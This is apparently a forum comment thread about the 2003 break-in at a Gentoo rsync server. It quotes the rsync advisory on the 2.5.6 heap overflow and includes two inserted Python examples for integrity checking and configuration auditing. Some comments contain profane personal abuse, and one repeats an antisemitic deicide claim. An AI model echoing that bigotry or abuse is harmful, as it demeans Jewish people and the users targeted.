You're thinking of when the first RPC vulnerability hit (which was patched two months before, by the way...to all those Debian-heads crying out how the kernel exploit was patched in September), and Microsoft used Akamai for a short while because the trojan was set to DDOS one of their URLs.
The "threat" passed and everyone forgot about it.
"Sufferin' succotash."
emerge rsync
emerge --update world
peace of mind !
Electronic Music Made Using Linux http://soundcloud.com/polyp
Why does everyone assume some one group is behind it?
Couldn't it be that, as with every other public website out there, random hackers try to break in for fun and vandalism?
Come on. I'm fully expecting someone to implicate Microsoft in some way, as they do in every OSS break-in article.
"Sufferin' succotash."
Wow, an admin who fesses up (within 24 hours of breach) when (s)he's been hacked. See, now that wasn't so bad, was it? Now why can't other admins do this too? Or at least follow the don'ts of damage control.
My opinion: for the same reason that officers of the peace make only vague handwavey-type sounds when asked if they have leads on the suspect of a crime.
So why brag about leads on /.? They have nothing to gain and everything to lose.
You cannot apply a technological solution to a sociological problem. (Edwards' Law)
I love it.
I've pointed out before that Windows is way more widespread than Linux, and so is more attacked and vulnerable, but then zealots come on and say Apache is the most-used on the net and yet not the most breached. But to this, it's already the most-breached operating system.
Hoot and holler about the reasons all you want, but them's the facts.
We REALLY, REALLY need to stop with the "Linux is invincible, Windows sucks" attitude. It's flat-out not true, and it's severely holding the community image back in the minds of the rest of the rational computing world who just uses what they use to get the job done and don't treat operating systems like religious belief systems.
"Sufferin' succotash."
A Netcraft search for rsync.gentoo.org shows more than one server. Two of them run Gentoo, two run Red Hat, one runs Debian, three run unknown Linux, and one runs FreeBSD (some of the servers are listed twice). There are more servers (14, if one is to believe 'host rsync.gentoo.org|wc -l'), but Netcraft is only interested in those with web-servers.
When I say, you're kidding, right?
Random hackers attack things. Stop trying to pin it on some one mysterious group. It makes you look so incredibly paranoid.
Yes, Linux servers are not perfect. Accept this, patch, fix, and move on. Microsoft did, and they haven't had a break-in since October of 2000. According to a recent article, they're attacked 2500 to 3000 times daily.
"Sufferin' succotash."
You could waste a bunch of paper or you could just write to a CD. You'll run out of paper way before you run out of space on the CD.
ayottesoftware.com
it DOES RUN GENTOO! That's what's making it worse.
For any Gentoo user running the latest and greatest (Accept ~X86), doing an emerge-sync and "Emerge -U world" is no small task. It requires a few Hail Marys and a human sacrifice to have a working system afterward. Users running the stable builds shouldn't have a problem though. I have personally blown up my Gentoo installation seven times, and each time I learn more about the inner workings of linux. BBH
...all Gentoo users deserve information about how this box, running Gentoo, got cracked remotely.
I'm not arguing one side or the other, just mentioning this for the sake of completeness. The post makes no specific mention that the compromised machine was itself running Gentoo. It may have been, it just wasn't stated one way or the other. And there's the possibility that the rootkit was installed locally and taken advantage of remotely.
I suggest immediate full-disclosure of the whole incident.
Your feelings about how devs handle security issues are yours to raise, and potentially rightly so. But take another look at the posting. It states that the purpose of the box was not solely to act as an rsync server. It's a donated service by a sponsor that also hosts other services on that same machine. After reading that post it's hard to even know for sure if it was rooted because it was a Gentoo rsync server or for some other unrelated reason:
The box provides other services not related to Gentoo Linux as well and the sponsor has requested that we not publicly identify the box at this time. Because the Gentoo part of this box appears to be unaffected by this exploit, we are currently honoring the sponsor's request. That said, if at any point, we determine that any file in the portage tree was inappropriately modified, we will release full details about the compromised server.
We don't like "security through obscurity"
I don't see any unneeded obscurity surrounding this. It sounds more like you're just unhappy with whatever happened in IRC today.
I'm against picketing, but I don't know how to show it.
First it was Debian, now it's gentoo.
I'm switching to my own home brewed OS
You vulnerable Linux people don't deserve my support
Hasta la vista, I won't be back!
I always wondered if admins in big places abused the links they managed.
One person could sniff MAJOR data from many diverse sources. This over time would result in some nice login/passwords.
What part of _downtown_ Philly has abandoned houses in it? These days, you gotta get at least a couple of miles from Center City to find an abandoned house.
Once is happenstance, twice is coincidence, three times is enemy action.
heh, are you the daniel mettler fucktard who was spamming #gentoo? gotta say, i agreed with ciaranm on that one...
-- roger55
Preach it brother!
How am I trolling?
I've unchecked my karma bonus and everything because I know this is offtopic. I was just curious?
"Sufferin' succotash."
You misspelled "are."
The log machine can very easily be perfect. There are two simple variations to this, one if you want it to work even after the box is rooted, one if you don't. The first is an inline network logger. It acts like a piece of copper wire, but records all the data going through it. The second is a serial or similar mass storage device that the computer writes its logs to. The device cannot be accessed for reading or resetting except through an interface not available to the computer.
Cars are built out of steel, not glass. Glass is a very strong material. But hit it with a hammer and it shatters. Steel just gets dented.
Gentoo had "ductile" security. They were able to limit the damage because they had some kind of Tripwire/mtree-like program running on the inside. Given the speed of the response, my guess is that they had a response plan ready to go.
The lesson is that measures to limit the damage from a break are as vital as measures to prevent breaks in the first place. Fire prevention doesn't substitute for sprinkler systems, and intrusion prevention doesn't substitute for backups. You've got to have both.
Only one user was kicked: some obnoxious little twat, h20, was flooding and generally annoying the hell out of me. I say good for ciaranm.
So did it get synched up?
Mod this up...
I'm half expecting Gartner group or Microsoft or some such other party to now step forward and say..."SEE! They have to have their code holding servers open to the net so that their distributed developer base can update and add to the source, the open source model is inherently flawed, as these break ins have proven! When all of your developers are working on an internal network like at Microsoft this could never happen!".
Not to sound all tinfoil hat or anything, but this could be another prong in the whole anti OSS FUD campaign.
I am NaN
Aww, poor baby. Got your little spamming ass kicked out of the IRC channel, eh? Dumb fuck.
It'll never happen, BSDs are too hard a target.
From the Gentoo Alert:
Gentoo realized that they got hacked after one day.
GNU Savannah realized that they got hacked after one month.
It's time to propagate the use of file integrity checkers! They can detect the effects of any new exploit and can't be circumvented (when properly used!).
AIDE
Tripwire
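The two posts above (the one suggesting that a signed checksum list from gentoo.org be compared against the local tree after each sync, and this one calling for AIDE/Tripwire-style file integrity checkers) describe the same mechanism: a baseline of file digests and metadata, kept where the monitored host cannot rewrite it, that a later scan is diffed against. The following is an added example of that mechanism in Python, not code from Gentoo, AIDE, Tripwire or the rsync project. It assumes an HMAC-SHA256 tag as a stand-in for the detached GPG signature the post implies, with the key held off the box; the directory tree and the "tampering" it detects are constructed inside the example.

```python
"""Minimal file-integrity checker in the spirit of AIDE / Tripwire / mtree.

Added example, not Gentoo's, AIDE's or Tripwire's code. The HMAC tag stands
in for a detached signature over the baseline; in practice the key (or the
signing key) must live somewhere the monitored host cannot write.
"""
import hashlib
import hmac
import json
import os
import stat
import tempfile


def snapshot_tree(root):
    """Walk `root` and record, per regular file, a SHA-256 digest plus the
    metadata a rootkit usually disturbs (size, mode bits, owner, mtime).
    Symlinks are recorded by target rather than followed, so a link
    re-pointed at a trojaned binary shows up as a change."""
    records = {}
    for dirpath, dirnames, filenames in os.walk(root):
        dirnames.sort()
        for name in sorted(filenames):
            full = os.path.join(dirpath, name)
            rel = os.path.relpath(full, root).replace(os.sep, "/")
            st = os.lstat(full)
            if stat.S_ISLNK(st.st_mode):
                records[rel] = {"type": "symlink", "target": os.readlink(full)}
                continue
            if not stat.S_ISREG(st.st_mode):
                continue  # sockets, fifos, devices are out of scope here
            digest = hashlib.sha256()
            with open(full, "rb") as fh:
                for chunk in iter(lambda: fh.read(65536), b""):
                    digest.update(chunk)
            records[rel] = {
                "type": "file",
                "sha256": digest.hexdigest(),
                "size": st.st_size,
                "mode": stat.S_IMODE(st.st_mode),
                "uid": st.st_uid,
                "gid": st.st_gid,
                "mtime": int(st.st_mtime),
            }
    return records


def compare_snapshots(baseline, current):
    """Diff two snapshots; any differing field counts as a modification."""
    added = sorted(set(current) - set(baseline))
    removed = sorted(set(baseline) - set(current))
    modified = sorted(p for p in set(baseline) & set(current)
                      if baseline[p] != current[p])
    return {"added": added, "removed": removed, "modified": modified}


def sign_snapshot(records, key):
    """Serialise canonically (sorted keys, no whitespace) and attach an
    HMAC-SHA256 tag so a tampered baseline is rejected, not trusted."""
    body = json.dumps(records, sort_keys=True, separators=(",", ":")).encode()
    return body, hmac.new(key, body, hashlib.sha256).hexdigest()


def load_signed_snapshot(body, tag, key):
    """Verify the tag in constant time before deserialising the baseline."""
    expected = hmac.new(key, body, hashlib.sha256).hexdigest()
    if not hmac.compare_digest(expected, tag):
        raise ValueError("baseline tag mismatch: refusing to trust it")
    return json.loads(body)


def demo():
    """Constructed scenario: baseline a tiny tree, then overwrite one file,
    drop a new one and re-point a symlink, and let the checker report it."""
    key = b"demo-key-kept-off-box"  # assumption: provisioned out of band
    root = tempfile.mkdtemp()
    os.makedirs(os.path.join(root, "bin"))
    with open(os.path.join(root, "bin", "ls"), "wb") as f:
        f.write(b"original ls\n")
    with open(os.path.join(root, "bin", "ps"), "wb") as f:
        f.write(b"original ps\n")
    os.symlink("ps", os.path.join(root, "bin", "procs"))
    body, tag = sign_snapshot(snapshot_tree(root), key)

    # Simulated post-compromise changes.
    with open(os.path.join(root, "bin", "ls"), "wb") as f:
        f.write(b"trojaned ls\n")
    with open(os.path.join(root, "bin", "sniffer"), "wb") as f:
        f.write(b"new file\n")
    os.unlink(os.path.join(root, "bin", "procs"))
    os.symlink("ls", os.path.join(root, "bin", "procs"))

    baseline = load_signed_snapshot(body, tag, key)
    return compare_snapshots(baseline, snapshot_tree(root))


if __name__ == "__main__":
    print(json.dumps(demo(), indent=2))
```

The point the checker makes about the Gentoo incident is the one the alert itself makes: a digest-plus-metadata baseline taken before the breach is what lets an admin say the portage tree was untouched, and the baseline is only worth that much if the attacker could not have rewritten it.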
"Word is that all 17 Linux users were affected."
A group of people in the UK recently came to the conclusion that IDS is actually the problem rather than the solution first hoped for.
Microsoft Hiring Unix Admins
This is from Microsoft's jobs page (old link, posted back in December 2000): http://www.microsoft.com/jobs/search/jobDetail.asp?fromPage=viewJobs&jobNumber=906950&page=1&msid1=-2049921163&msid2=-492026938&msid3=-2123347170&msid4=2105645115
SYSTEMS ADMINISTRATOR [Job Code: N05rc-dc ]
Required skills: Strong inter-personal and communication skills; high skill of most UNIX commands/utilities. Familiarity with most basic system administration tools and processes; for example, can boot/shutdown a machine, use backup programs and fsck, maintain system files (hosts, resolv.conf, etc). Fundamental understanding of a UNIX-based operating system; for example, understands job control, soft and hard links, distinctions between the kernel and the shell. Job also requires occasional 24x7 on-call availability.
Required background: One to three years of system administration experience.
Desirable:
- A degree in computer science or a related field.
- Familiarity with networked computing environment concepts; for example, can use the route command, add a workstation to a network, netstat, etc.
- Ability to write scripts in some administrative language (Perl or shell).
- Experience with Solaris and Sun hardware, especially Enterprise series
- Familiar with RAID technology
- Windows NT experience
- Experience in a 24x7 data center environment
Special Note: Whoever we hire will have to be able to function in a 24/7 production environment, be willing to be on call, and be able to learn how to fix all of the problems that come up with the site. The qualifications below give a good idea of what problems we find on the site. I can't get any more specific than that since we see many unique problems that we may have never seen before.
Job Location: Mountain View, California
they may know something now.
It is a *network* intrusion detection system.
There's a big difference there.
NIDS generally sniff packets and look for signatures of attacks.
(on the *network*)
A box level IDS keeps an eye on filesystems to see what has been modified, keeping its information in some more-secure place. (read-only media or something)
I browse at +5 Flamebait- moderation for all or moderation for none.
But I'm glad that there have been so many attacks against linux and other oss projects.
Kernel.org, debian.org, gentoo.org, Gnu.org: all of them had security holes and now those holes are plugged.
I used to run a few servers. Mostly web-servers, but I had a few for mail and other things. Almost every single one was hacked all in the same 2 month period. I had kept up with updates and I figured I was secure. If I wasn't hacked I would have never known that I wasn't secure and I could have been seriously screwed down the line. It was a much needed eye opener.
I'm just this guy, you know?
I installed 3.4, did a xf86conf, got X just right, cd /usr/ports/x11/kde ; make && make install, the same with fluxbox, and have a suh-WEET desktop with fluxbox and all the KDE apps I need.
I've heard that it is possible to make Ethernet cables with no transmit lines. Basically, you can write to a box connected that way but that box can't talk back. The best you could do then if there was a vulnerability is crash the syslog process on the dropbox.
Ah!
Treehugger? Treehugger... Treehugger!
You were trolling. Whoever modded you as insightful is full of shit. Just like you are.
I think something is wrong with my Gentoo or something...
fede usr # netstat -n -t
Active Internet connections (w/o servers)
Proto Recv-Q Send-Q Local Address Foreign Address State
65.54.230.240:443 TIME_WAIT
tcp 0 0 148.240.150.139:32834 65.54.230.240:443 ESTABLISHED
tcp 1 0 148.240.152.95:34976
fede usr # host 65.54.230.240
Host 240.230.54.65.in-addr.arpa not found: 3(NXDOMAIN)
fede usr # ping 65.54.230.240
PING 65.54.230.240 (65.54.230.240) 56(84) bytes of data.
--- 65.54.230.240 ping statistics ---
2 packets transmitted, 0 received, 100% packet loss, time 1014ms
fede usr # whois 65.54.230.240
OrgName: Microsoft Corp
OrgID: MSFT
Address: One Microsoft Way
City: Redmond
StateProv: WA
PostalCode: 98052
Country: US
NetRange: 65.52.0.0 - 65.55.255.255
CIDR: 65.52.0.0/14
NetName: MICROSOFT-1BLK
NetHandle: NET-65-52-0-0-1
Parent: NET-65-0-0-0-0
NetType: Direct Assignment
NameServer: DNS1.CP.MSFT.NET
NameServer: DNS2.CP.MSFT.NET
NameServer: DNS1.TK.MSFT.NET
NameServer: DNS1.DC.MSFT.NET
NameServer: DNS1.SJ.MSFT.NET
Comment:
RegDate: 2001-02-14
Updated: 2002-12-05
TechHandle: ZM23-ARIN
TechName: Microsoft Corporation
TechPhone: +1-425-882-8080
TechEmail: noc@microsoft.com
OrgAbuseHandle: ABUSE231-ARIN
OrgAbuseName: Abuse
OrgAbusePhone: +1-425-882-8080
OrgAbuseEmail: abuse@microsoft.com
OrgNOCHandle: ZM23-ARIN
OrgNOCName: Microsoft Corporation
OrgNOCPhone: +1-425-882-8080
OrgNOCEmail: noc@microsoft.com
OrgTechHandle: MSFTP-ARIN
OrgTechName: MSFT-POC
OrgTechPhone: +1-425-882-8080
OrgTechEmail: iprrms@microsoft.com
I am not using any SSL server right now...
unfinished: (adj.)
Wow. 20 people, huh. That would explain why every file on my box was replaced by a picture of the goatse.cx guy.
*BSD is dying.
Oh, wait... never mind.
not really...
Windows is attacked FAR more than OSS. Why?
Recent Windows attacks (...notably and demonstrably Blaster...) have been because of the business model of (the criminal organisation) Micro$oft. There is a not insignificant reservoir of bad feeling about both their illegal use of monopolies, and the cost to business of finding solutions and workarounds to their bugs.
On the other hand the recent attacks on Debian and Gentoo, follow a very different pattern.
The break-ins were very sophisticated (in the sense that the vulnerability exploited was largely unknown), but then having broken in the behaviour was code-bunny - install sucKIT
Why would a hacker who had presumably discovered the exploit one day when perusing the kernel, follow up with such an unintriguing response?
and then, not completely bored yet, keep doing the same thing?
This is a professional bounty job to backdoor open source development servers.
You know it
I know it
Mr Gates and Mr Bush know it
Don't they sing that song 'Bye Bye Bye'?
You say self-important egomaniac like it's a bad thing. - Peter Dragon
i just tried to update some sources on a project of mine and i noticed cvs hung for a while. i went to savannah and i saw the "statement". it mentions "minimal services back up by Friday". does anyone know if minimal will include cvs? i'm not trying to hurry them, i'm just curious.
if there are any savannah folks out there reading this, let me say you do a wonderful job keeping everything up and running.
thanks.
-- john
Speak for yourself. It's the Jews who committed the crime of slaying the 'person on the cross'. The same is being done today by the 'Big Guys' -- if something goes against what they believe it, they declare, "You are with us or against us".
BWAHAHAHAHAHAHAHAHAH!!!!!!!!1!!!!!!!
How utterly bloody pathetic. Even your brethren don't like you and mod you down.
Fuck you dickweed.
Did you see anywhere in the message any reference to M$?
No, you stupid fuck.
My post was about COMPUTER SECURITY.
Now, go fuck yourself...
Security is so much more than stopping the user at the door. There are always going to be 0-day exploits, which have no patches. The trick with security is mitigating your exposure. Getting root is not a successful hack, keeping it is. So what if someone rooted my box, if I can see it; I can deal with it. These latest big-profile compromises are actually good news because the attacks were not successful. It shows how well Linux can mitigate exposure, and how it layers its security. This is where Microsoft goes wrong with its latest methodology towards security. They think putting a firewall in place is all that you need, which is absolutely wrong.
Nothing more, For me to say; About my life, A life of dreams....
In the interest of continuing cooperation and in helping to improve security for all essential Free Software infrastructure, and despite important philosophical differences, we are working closely with Debian project members to find the perpetrators and to secure essential Free Software infrastructure for the future.
This just had to have RMS involved, managing to get his bigoted statements in, even when the system has been compromised.
Damn man, you've been rooted and you can think of nothing better to say than that you have "important philosophical differences" with the rest of the OSS world, but that you will be OH SO GENEROUS and actually bother to talk to some people who don't get all hyped up when they say Linux and not GNU/Linux.
That is why your fuckshit GNU/Hurd is still where it is you pompous clown.
We all know in order for 'nix to make it to the desktop, it has to become WAY more user friendly.
You mean like Mac OSX?
I was going to post it here, but the moronic lameness filter won't let me. So you'll need to look at rsync.samba.org.
switch to freebsd!
...that Microsoft is behind this? This is the second open source Linux distribution that has been attacked. It could also be some students that are paid by Microsoft to show how bad the security is on Linux. I have my doubts.
Yeah, I think Amgine007 said the opposite of what he meant.
Gentoo would be ideal with a web of trust...
Don't you mean a web of distrust, or at least one that didn't rely on trust at all? Ultimately, one can't design a system without some level of trust somewhere, but if you want a web of something make it a web full of nodes that need not depend on the veracity of a centralized source.
I installed W2K under VMware and had it booted for 4 hours. The next day I got e-mail from my ISP informing me that other customers of my ISP had complained that I was broadcasting Blaster. Four Hours!
> Come on. Do you really think Microsoft knows that much about security?
Don't insult me. I worked at Microsoft too and know quite a bit about security. I also know why many Microsoft products don't have much of it, and it has nothing to do with ignorance of programmers.
http://rsync.samba.org/index.html
The rsync team has received evidence that a vulnerability in rsync was recently used in combination with a Linux kernel vulnerability to compromise the security of a public rsync server. While the forensic evidence we have is incomplete, we have pieced together the most likely way that this attack was conducted and we are releasing this advisory as a result of our investigations to date...
If running Gentoo, I wonder if they were using gentoo-sources for the kernel? It includes the grsecurity patches, which in theory make this sort of thing more difficult (although I'm not sure if they stop this particular exploit or not).
I just can't wait until grsecurity is ported to the 2.6 kernels...
seem to be responsible for this break-in. The information has already been posted to Bugtraq by a gentoo team member. Here is the post text:
Background
----------
The rsync team has received evidence that a vulnerability in rsync was recently used in combination with a Linux kernel vulnerability to compromise the security of a public rsync server. While the forensic evidence we have is incomplete, we have pieced together the most likely way that this attack was conducted and we are releasing this advisory as a result of our investigations to date.
Our conclusions are that:
- rsync version 2.5.6 contains a heap overflow vulnerability that can be used to remotely run arbitrary code.
- While this heap overflow vulnerability could not be used by itself to obtain root access on a rsync server, it could be used in combination with the recently announced brk vulnerability in the Linux kernel to produce a full remote compromise.
- The server that was compromised was using a non-default rsyncd.conf option use chroot = no. The use of this option made the attack on the compromised server considerably easier. A successful attack is almost certainly still possible without this option, but it would be much more difficult.
Please note that this vulnerability only affects the use of rsync as a rsync server. To see if you are running a rsync server you should use the netstat command to see if you are listening on TCP port 873. If you are not listening on TCP port 873 then you are not running a rsync server.
New rsync release
-----------------
In response we have released a new version of rsync, version 2.5.7. This is based on the current stable 2.5.6 release with only the changes necessary to prevent this heap overflow vulnerability. There are no new features in this release.
We recommend that anyone running a rsync server take the following steps:
1) update to rsync version 2.5.7 immediately
2) if you are running a Linux kernel prior to version 2.4.23 then you should upgrade your kernel immediately. Note that some distribution vendors may have patched versions of the 2.4.x series kernel that fix the brk vulnerability in versions before 2.4.23. Check with your vendor security site to ensure that you are not vulnerable to the brk problem.
3) review your /etc/rsyncd.conf configuration file. If you are using the option use chroot = no then remove that line or change it to use chroot = yes. If you find that you need that option for your rsync service then you should disable your rsync service until you have discussed a workaround with the rsync maintainers on the rsync mailing list. The disabling of the chroot option should not be needed for any normal rsync server.
The patches and full source for rsync version 2.5.7 are available from http://rsync.samba.org/ and mirror sites. We expect that vendors will produce updated packages for their distributions shortly.
Credits
-------
The rsync team would like to thank the following individuals for their assistance in investigating this vulnerability and producing this response:
Timo Sirainen <tss iki.fi>
Mike Warfield <mhw wittsend.com>
Paul Russell <rusty samba.org>
Andrea Barisani <lcars gentoo.org>
Regards,
The rsync team
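The advisory's three checks (is the daemon listening on TCP 873, is the rsync version older than 2.5.7, and does rsyncd.conf turn off use chroot anywhere) are mechanical enough to script. The following is an added example in Python, not code from the rsync team or the Gentoo project. It assumes that rsyncd.conf follows the usual `key = value` / `[module]` layout with global settings before the first module, that the `rsync --version` banner contains a dotted version number, and that `netstat -ltn` output is in the column layout shown in the constructed sample; the configuration, netstat listing and version banner in the example are all constructed for the demonstration.

```python
"""Audit helpers for the three steps in the rsync 2.5.6 advisory.

Added example, not the rsync team's or Gentoo's code. Input formats
(rsyncd.conf layout, `rsync --version` banner, `netstat -ltn` columns)
are assumptions stated in the lead-in; the samples below are constructed.
"""
import re

GLOBAL = "__global__"  # pseudo-section holding settings before the first [module]


def parse_rsyncd_conf(text):
    """Parse rsyncd.conf into {section: {key: value}}. Keys are lowercased and
    whitespace-normalised ('use  chroot' == 'use chroot'); '#' and ';' start
    comments; settings before the first [module] go under GLOBAL."""
    conf = {GLOBAL: {}}
    section = GLOBAL
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line[0] in "#;":
            continue
        header = re.match(r"^\[(.+)\]$", line)
        if header:
            section = header.group(1).strip()
            conf.setdefault(section, {})
            continue
        if "=" in line:
            key, _, value = line.partition("=")
            conf[section][" ".join(key.lower().split())] = value.strip()
    return conf


def effective_setting(conf, module, key, default):
    """A module setting overrides the global one, which overrides the default."""
    return conf[module].get(key, conf[GLOBAL].get(key, default))


def modules_without_chroot(conf):
    """Modules whose effective 'use chroot' is off. rsync's default is yes, so a
    module is flagged only when it, or the global section, turns it off."""
    off = {"no", "false", "0"}
    return sorted(m for m in conf if m != GLOBAL
                  and effective_setting(conf, m, "use chroot", "yes").lower() in off)


def rsync_daemon_listening(netstat_output, port=873):
    """Scan `netstat -ltn`-style lines for a TCP socket in LISTEN on `port`.
    Works for IPv4 ('0.0.0.0:873') and IPv6 (':::873') local addresses."""
    for line in netstat_output.splitlines():
        fields = line.split()
        if len(fields) >= 6 and fields[0].startswith("tcp") and fields[-1] == "LISTEN":
            if fields[3].rsplit(":", 1)[-1] == str(port):
                return True
    return False


def parse_version(version_output):
    """Pull the first dotted triple out of an `rsync --version` banner."""
    m = re.search(r"\b(\d+)\.(\d+)\.(\d+)\b", version_output)
    if not m:
        raise ValueError("no version number found in %r" % version_output)
    return tuple(int(x) for x in m.groups())


def needs_upgrade(version_output, fixed=(2, 5, 7)):
    """True when the installed rsync predates the 2.5.7 fix release."""
    return parse_version(version_output) < fixed


def audit(conf_text, netstat_output, version_output):
    """Apply the advisory's logic: no listener on 873 means no rsync server and
    nothing to report; otherwise report an old version and any chroot-less module."""
    findings = []
    if not rsync_daemon_listening(netstat_output):
        return findings
    if needs_upgrade(version_output):
        installed = ".".join(str(n) for n in parse_version(version_output))
        findings.append("rsync %s is older than 2.5.7: upgrade" % installed)
    for module in modules_without_chroot(parse_rsyncd_conf(conf_text)):
        findings.append("module [%s] runs with use chroot = no: "
                        "set it to yes or disable the module" % module)
    return findings


# Constructed samples: a global 'use chroot = no' that one module overrides.
SAMPLE_CONF = """
# constructed sample rsyncd.conf
use chroot = no
max connections = 4

[gentoo-portage]
    path = /srv/rsync/gentoo-portage
    read only = yes

[uploads]
    path = /srv/rsync/uploads
    use chroot = yes
    read only = no
"""

SAMPLE_NETSTAT = """Active Internet connections (only servers)
Proto Recv-Q Send-Q Local Address           Foreign Address         State
tcp        0      0 0.0.0.0:873             0.0.0.0:*               LISTEN
tcp6       0      0 :::22                   :::*                    LISTEN
"""

SAMPLE_VERSION = "rsync  version 2.5.6  protocol version 26"

if __name__ == "__main__":
    for finding in audit(SAMPLE_CONF, SAMPLE_NETSTAT, SAMPLE_VERSION):
        print(finding)
```

Run on a real host the three inputs would come from `/etc/rsyncd.conf`, `netstat -ltn` and `rsync --version`; the inheritance rule in `effective_setting` is what catches the case in the sample, where a single global `use chroot = no` silently applies to every module that does not override it.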
A quick perusal of your posting history shows nothing but attacks on linux and praise for micro-sloth. Douchebag says what?
Next.
Actually, the ebuilds are shell scripts.
md5sum is no protection if they are never checked.
Don't confuse ebuild with spec files from RPM, though RPMs can contain hostile scripts as well.
Anything is possible given time and money.